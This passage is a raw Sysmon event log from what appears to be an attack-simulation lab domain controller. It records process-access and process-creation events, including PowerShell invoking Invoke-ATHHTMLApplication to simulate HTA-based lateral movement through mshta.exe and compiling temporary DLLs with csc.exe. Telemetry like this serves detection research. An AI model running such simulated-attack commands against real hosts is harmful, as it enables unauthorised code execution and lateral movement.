16:01:38.862{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029109Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.862{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029108Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.862{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029107Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.862{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-53E2-6008-A606-00000000A301}3516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029106Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.862{7901BC46-53E2-6008-A306-00000000A301}41286060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7901BC46-53E2-6008-A606-00000000A301}3516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\db79b1cc2b753cce16ad58d141a194ca\Microsoft.PowerShell.Commands.Utility.ni.dll+52514c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\db79b1cc2b753cce16ad58d141a194ca\Microsoft.PowerShell.Commands.Utility.ni.dll+52514c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e0621a5e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e05fd837(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e05fd508(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e10aeb6d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e05be09e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e061c56d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e05ffbd2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e05ffbd2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e05ffa63(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e05f19e8(wow64) 154100x800000000000000029105Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.873{7901BC46-53E2-6008-A606-00000000A301}3516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\agaabhld\agaabhld.cmdline"C:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Invoke-ATHHTMLApplication -HTAFilePath Test.hta -ScriptEngine JScript -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath $env:windir\system32\mshta.exe} 11241100x800000000000000029104Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.862{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\agaabhld\agaabhld.cmdline2021-01-20 16:01:38.862 11241100x800000000000000029103Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.localDLL2021-01-20 16:01:38.862{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\agaabhld\agaabhld.dll2021-01-20 16:01:38.862 11241100x800000000000000029102Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.localDLL2021-01-20 16:01:38.737{7901BC46-53E2-6008-A406-00000000A301}3560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\ykro4hgn\ykro4hgn.dll2021-01-20 16:01:38.628 10341000x800000000000000029101Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.721{7901BC46-4FA9-6008-4405-00000000A301}70003220C:\Windows\system32\conhost.exe{7901BC46-53E2-6008-A506-00000000A301}6876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029100Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.721{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029099Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.721{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029098Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.721{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029097Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.721{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-53E2-6008-A506-00000000A301}6876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029096Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.721{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029095Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.721{7901BC46-53E2-6008-A406-00000000A301}35606196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{7901BC46-53E2-6008-A506-00000000A301}6876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029094Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.726{7901BC46-53E2-6008-A506-00000000A301}6876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES97F7.tmp" "c:\Users\Administrator\AppData\Local\Temp\ykro4hgn\CSC74E2BD82DC64CA6879B178B26A73FD3.TMP"C:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{7901BC46-53E2-6008-A406-00000000A301}3560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\ykro4hgn\ykro4hgn.cmdline" 10341000x800000000000000029093Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.659{7901BC46-4FA9-6008-4405-00000000A301}70003220C:\Windows\system32\conhost.exe{7901BC46-53E2-6008-A406-00000000A301}3560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029092Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.659{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029091Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.659{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029090Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.659{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029089Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.659{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-53E2-6008-A406-00000000A301}3560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029088Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.659{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029087Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.659{7901BC46-53E2-6008-A306-00000000A301}41286060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7901BC46-53E2-6008-A406-00000000A301}3560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\db79b1cc2b753cce16ad58d141a194ca\Microsoft.PowerShell.Commands.Utility.ni.dll+52514c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\db79b1cc2b753cce16ad58d141a194ca\Microsoft.PowerShell.Commands.Utility.ni.dll+52514c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e0621a5e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e05fd837(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e05fd508(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e10aeb6d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e05be09e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e061c56d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e05ffbd2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e05ffbd2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e05ffbd2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+e05ffa63(wow64) 154100x800000000000000029086Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.636{7901BC46-53E2-6008-A406-00000000A301}3560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths 